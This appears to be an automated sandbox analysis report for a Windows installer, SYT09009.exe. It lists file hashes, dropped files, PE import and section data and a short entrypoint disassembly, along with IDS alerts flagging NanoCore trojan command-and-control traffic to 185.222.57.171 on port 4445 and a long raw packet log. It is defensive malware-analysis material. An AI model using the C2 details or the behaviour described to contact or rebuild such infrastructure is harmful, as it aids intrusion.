Size (bytes):	426832
Entropy (8bit):	7.999527918131335
Encrypted:	true
SSDEEP:	6144:zKfHbamD8WN+JQYrjM7Ei2CsFJjyh9zvgPonV5HqZcPVT4Eb+Z6no3QSzjeMsdF/:zKf137EiDsTjevgArYcPVLoTQS+0iv
MD5:	653DDDCB6C89F6EC51F3DDC0053C5914
SHA1:	4CF7E7D42495CE01C261E4C5C4B8BF6CD76CCEE5
SHA-256:	83B9CAE66800C768887FB270728F6806CBEBDEAD9946FA730F01723847F17FF9
SHA-512:	27A467F2364C21CD1C6C34EF1CA5FFB09B4C3180FC9C025E293374EB807E4382108617BB4B97F8EBBC27581CD6E5988BB5E21276B3CB829C1C0E49A6FC9463A0
Malicious:	false
Preview:	..g&jo...IPg...GM....R>i...o...I.>.&.r{....8...}...E....v.!7.u3e.. .....db...}.......".t(.xC9.cp.B....7...'.......%......w.^.._.......B.W%.<..i.0.{9.xS...5...)..w..$..C..?`F..u.5.T.X.w'Si..z.n{...Y!m...RA...xg....[7...z..9@.K.-...T..+.ACe....R....enO.....AoNMT.\^....}H&..4I...B.:..@..J...v..rI5..kP......2j....B..B.~.T..>.c..emW;Rn<9..[.r.o....R[....@=...:...L.g<.....I..%4[.G^.~.l'......v.p&.........+..S...9d/.{..H.`@.1..........f.\s...X.a.].<.h...J4...k.x....%3.......3.c..?%....>.!.}..)(.{...H...3..`'].Q.[sN..JX(.%pH....+......(...v.....H...3..8.a_..J..?4...y.N(..D.h..g.jD..I...44Q?..N......oX.A......l...n?./..........$.!..;.^9"H...........OkF....v.m_.e.v..f...."..bq{.....O.-....%R+...-..P.i..t5....2Z# ...#...,L..{..j..heT -=Z.P;...g.m)<owJ].J..../.p..8.u8.&..#.m9...j%..g&....g.x.I,....u.[....>./W...........X...bZ...ex.0..x.}.....Tb...[..H_M._.^N.d&...g._."@4N.pDs].GbT.......&p........Nw...%$=.....{..J.1....2....<E{..<!G..

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\task.dat Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.85263908467479
Encrypted:	false
SSDEEP:	3:oMty8WbSI1u:oMLWuI1u
MD5:	A35128E4E28B27328F70E4E8FF482443
SHA1:	B89066B2F8DB34299AABFD7ABEE402D5444DD079
SHA-256:	88AEA00733DC4B570A29D56A423CC5BF163E5ACE7AF349972EB0BBA8D9AD06E1
SHA-512:	F098E844B5373B34642B49B6E0F2E15CFDAA1A8B6CABC2196CEC0F3765289E5B1FD4AB588DD65F97C8E51FA9A81077621E9A06946859F296904C646906A70F33
Malicious:	false
Preview:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe

\Device\ConDrv Download File
Process:	C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	306
Entropy (8bit):	4.969261552825097
Encrypted:	false
SSDEEP:	6:zx3M1tlAX8bSWR30qysGMQbSVRRZBXVRbJ0fFdCsq2UTiMdH8stCal+n:zK1XnV30ZsGMIG9BFRbQdCT2UftCM+
MD5:	F227448515085A647910907084E6728E
SHA1:	5FA1A8E28B084DA25A1BBC51A2D75810CEF57E2C
SHA-256:	662BA47D628FE8EBE95DD47B4482110A10B49AED09387BC0E028BB66E68E20BD
SHA-512:	6F6E5DFFF7B17C304FB19B0BA5466AF84EF98A5C2EFA573AF72CFD3ED6964E9FD7F8E4B79FCFFBEF87CE545418C69D4984F4DD60BBF457D0A3640950F8FC5AF0
Malicious:	false
Preview:	Microsoft (R) Build Engine Version 2.0.50727.8922..[Microsoft .NET Framework, Version 2.0.50727.8922]..Copyright (C) Microsoft Corporation 2005. All rights reserved.....MSBUILD : error MSB1003: Specify a project or solution file. The current working directory does not contain a project or solution file...

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	6.7295913886343195
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SYT09009.exe
File size:	555010
MD5:	fbfddfc110fd9d3775674447316de3d8
SHA1:	250149eebd54c774175cef2a09344cf429ca6f57
SHA256:	b98a4c0f84e431cbff5477f1e1ddfe1a93ba56775148cfca7f061f9beca0e48f
SHA512:	ffa4360b559cda6b7c1d5ec9cb0f89446be9f693a34c4bb35e6b8d4c26778d95e7139634cf6ba1896dc254c9bcc55fb171252c365ae678e59c8338a09261f842
SSDEEP:	6144:49X0GPoprRVuufOwF9z+53e7/1yzxQ63W9CgE4iB1fMMtD8Dbc:O0LrP/OMhEzWskiznkA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG._...PG..PF.IPG._...PG..sw..PG..VA..PG.Rich.PG.........PE..L...".$_.................f...\|......H3............@

File Icon


Icon Hash:	ae8cae8eb6aabe00

Static PE Info

General
Entrypoint:	0x403348
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5F24D722 [Sat Aug 1 02:44:50 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	ced282d9b261d1462772017fe2f6972b

Entrypoint Preview

Instruction
sub esp, 00000184h
push ebx
push esi
push edi
xor ebx, ebx
push 00008001h
mov dword ptr [esp+18h], ebx
mov dword ptr [esp+10h], 0040A198h
mov dword ptr [esp+20h], ebx
mov byte ptr [esp+14h], 00000020h
call dword ptr [004080B8h]
call dword ptr [004080BCh]
and eax, BFFFFFFFh
cmp ax, 00000006h
mov dword ptr [0042F42Ch], eax
je 00007F8840A0D453h
push ebx
call 00007F8840A105B6h
cmp eax, ebx
je 00007F8840A0D449h
push 00000C00h
call eax
mov esi, 004082A0h
push esi
call 00007F8840A10532h
push esi
call dword ptr [004080CCh]
lea esi, dword ptr [esi+eax+01h]
cmp byte ptr [esi], bl
jne 00007F8840A0D42Dh
push 0000000Bh
call 00007F8840A1058Ah
push 00000009h
call 00007F8840A10583h
push 00000007h
mov dword ptr [0042F424h], eax
call 00007F8840A10577h
cmp eax, ebx
je 00007F8840A0D451h
push 0000001Eh
call eax
test eax, eax
je 00007F8840A0D449h
or byte ptr [0042F42Fh], 00000040h
push ebp
call dword ptr [00408038h]
push ebx
call dword ptr [00408288h]
mov dword ptr [0042F4F8h], eax
push ebx
lea eax, dword ptr [esp+38h]
push 00000160h
push eax
push ebx
push 00429850h
call dword ptr [0040816Ch]
push 0040A188h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8544	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x38000	0x48ba8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x29c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6457	0x6600	False	0.66823682598	data	6.43498570321	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1380	0x1400	False	0.4625	data	5.26100389731	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x25538	0x600	False	0.463541666667	data	4.133728555	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.ndata	0x30000	0x8000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x38000	0x48ba8	0x48c00	False	0.0640470629296	data	4.76688901353	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x38340	0x42028	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x7a368	0x25a8	data	English	United States
RT_ICON	0x7c910	0x10a8	data	English	United States
RT_ICON	0x7d9b8	0xea8	data	English	United States
RT_ICON	0x7e860	0x8a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_ICON	0x7f108	0x668	data	English	United States
RT_ICON	0x7f770	0x568	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x7fcd8	0x468	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x80140	0x2e8	data	English	United States
RT_ICON	0x80428	0x128	GLS_BINARY_LSB_FIRST	English	United States
RT_DIALOG	0x80550	0x100	data	English	United States
RT_DIALOG	0x80650	0x11c	data	English	United States
RT_DIALOG	0x80770	0x60	data	English	United States
RT_GROUP_ICON	0x807d0	0x92	data	English	United States
RT_MANIFEST	0x80868	0x340	XML 1.0 document, ASCII text, with very long lines, with no line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	RegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
SHELL32.dll	SHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
ole32.dll	IIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
USER32.dll	SetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
GDI32.dll	SetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
KERNEL32.dll	GetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, ReadFile, GetTempFileNameA, WriteFile, RemoveDirectoryA, CreateProcessA, CreateFileA, GetLastError, CreateThread, CreateDirectoryA, GlobalUnlock, GetDiskFreeSpaceA, GlobalLock, SetErrorMode, GetVersion, lstrcpynA, GetCommandLineA, GetTempPathA, lstrlenA, SetEnvironmentVariableA, ExitProcess, GetWindowsDirectoryA, GetCurrentProcess, GetModuleFileNameA, CopyFileA, GetTickCount, Sleep, GetFileSize, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/11/21-19:41:00.217795	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49718	4445	192.168.2.5	185.222.57.171
05/11/21-19:41:07.017276	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49722	4445	192.168.2.5	185.222.57.171
05/11/21-19:41:13.074122	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49723	4445	192.168.2.5	185.222.57.171
05/11/21-19:41:17.376493	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49724	4445	192.168.2.5	185.222.57.171
05/11/21-19:41:23.416228	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49727	4445	192.168.2.5	185.222.57.171
05/11/21-19:41:30.481428	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49728	4445	192.168.2.5	185.222.57.171
05/11/21-19:41:36.494819	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49732	4445	192.168.2.5	185.222.57.171
05/11/21-19:41:42.950341	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49733	4445	192.168.2.5	185.222.57.171
05/11/21-19:41:49.728010	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49740	4445	192.168.2.5	185.222.57.171
05/11/21-19:41:56.010318	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49741	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:02.700606	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49742	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:08.910577	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49743	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:14.788279	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49752	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:20.775288	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49755	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:26.659939	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49756	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:32.535583	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49759	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:38.910159	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49760	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:44.786453	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49761	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:50.753969	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49762	4445	192.168.2.5	185.222.57.171
05/11/21-19:42:57.151446	TCP	2025019	ET TROJAN Possible NanoCore C2 60B	49763	4445	192.168.2.5	185.222.57.171

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 11, 2021 19:40:39.981837988 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:39.982028008 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525325060 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525486946 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525574923 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525631905 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525676966 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525705099 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525723934 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525751114 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525768995 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.525800943 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.572941065 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.572962999 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573002100 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573136091 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573510885 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573528051 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573539019 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573551893 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573559046 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573565006 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573609114 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573632956 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573751926 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573787928 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.573909998 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.573949099 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.574012041 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.574059010 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.574120998 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.574136972 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.574183941 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:44.574248075 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.574395895 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.751949072 CEST	443	49703	131.253.33.200	192.168.2.5
May 11, 2021 19:40:44.752115965 CEST	49703	443	192.168.2.5	131.253.33.200
May 11, 2021 19:40:46.702603102 CEST	49693	443	192.168.2.5	20.50.102.62
May 11, 2021 19:40:46.702687979 CEST	49696	80	192.168.2.5	93.184.220.29
May 11, 2021 19:40:46.702949047 CEST	49694	443	192.168.2.5	20.50.102.62
May 11, 2021 19:41:00.139692068 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.188246012 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.188344002 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.217794895 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.276120901 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.276194096 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.279598951 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.279716015 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.338560104 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.338622093 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.385493994 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.404017925 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.479083061 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.479147911 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.500022888 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.500044107 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.500060081 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.500076056 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.500087023 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.500097036 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.500159025 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.548785925 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.548820019 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.548832893 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.548844099 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.548860073 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.548873901 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.548886061 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.548902035 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.548913956 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.548979044 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.549019098 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.595504999 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595524073 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595540047 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595560074 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595577002 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595592022 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595597029 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.595607996 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595618963 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.595624924 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595638037 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.595640898 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595657110 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595659971 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.595669031 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.595695019 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.598835945 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.598855972 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.598870993 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.598886967 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.598897934 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.598923922 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.598952055 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.602694035 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642422915 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642447948 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642465115 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642484903 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642499924 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642503023 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642515898 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642519951 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642530918 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642540932 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642549992 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642565966 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642566919 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642581940 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642590046 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642597914 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642613888 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642615080 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642628908 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642643929 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642643929 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642659903 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642662048 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642677069 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642678976 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642694950 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642700911 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642709970 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642718077 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642728090 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642743111 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642745018 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642754078 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.642764091 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.642791986 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.645314932 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.645337105 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.645350933 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.645366907 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.645394087 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.645396948 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.645416975 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.645432949 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.645433903 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.645448923 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.645457029 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.645459890 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.645478010 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.645500898 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.666744947 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.667164087 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.691742897 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.691768885 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.691783905 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.691803932 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.691819906 CEST	49718	4445	192.168.2.5	185.222.57.171
May 11, 2021 19:41:00.691822052 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.691838026 CEST	4445	49718	185.222.57.171	192.168.2.5
May 11, 2021 19:41:00.691848040 CEST	49718	4445	192.168.2.5	185.222.57.171
